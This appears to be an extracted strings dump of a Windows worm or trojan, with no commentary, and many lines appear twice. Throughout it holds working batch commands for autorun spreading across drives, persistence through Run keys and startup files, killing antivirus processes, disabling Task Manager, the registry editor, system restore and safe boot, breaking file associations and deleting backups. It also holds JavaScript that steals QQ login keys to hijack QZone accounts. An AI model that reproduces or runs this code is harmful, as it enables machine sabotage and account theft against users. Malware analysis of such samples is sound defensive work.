for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat r s h >nul
attrib d:\Program" "Files\run.bat r s h >nul
hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
assoc .exe=nullfile
assoc .exe=nullfile
assoc .reg=nullfile
assoc .reg=nullfile
assoc .bat=nullfile
assoc .bat=nullfile
assoc .cmd=nullfile
assoc .cmd=nullfile
assoc .vbs=nullfile
assoc .vbs=nullfile
assoc .txt=nullfile
assoc .txt=nullfile
assoc .com=nullfile
assoc .com=nullfile
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
goto 22c:\slears.bat
goto 22c:\slears.bat
.slear
.slear
d:\sleartest.exe
d:\sleartest.exe
adm-music.com
adm-music.com
O%u,%
O%u,%
J÷%
J÷%
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
c:\windows\system32\
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
VVV.dywt.com.cn
%s
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
UnhookWindowsHookEx
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)
1.6.0.0
(hXXp://VVV.eyuyan.com)
%original file name%.exe_1756_rwx_00401000_000E4000:
atl.dll
wininet.dll
kernel32.dll
advapi32.dll
NTDLL.DLL
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
sleartest.exe
dll.bat
\*.dll
exe.bat
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXp://
len = str.length; i
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
a += (a.indexOf("?") > -1 ? "&": "?") + "g_tk=" + QZFL.pluginsDefine.getACSRFToken();
fm.action = a
slear && del / f / s / q c:\slear.bat
c:\slear.bat
cmd.exe
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
hXXp://VVV.shafou.com
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf +r +s +h >>d:\setup.bat
attrib d:\setup.bat +r +s +h >>d:\setup.bat
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat +r +s +h%
attrib %systemroot%/windows.bat +r +s +h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat +r +s +h >nul
hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders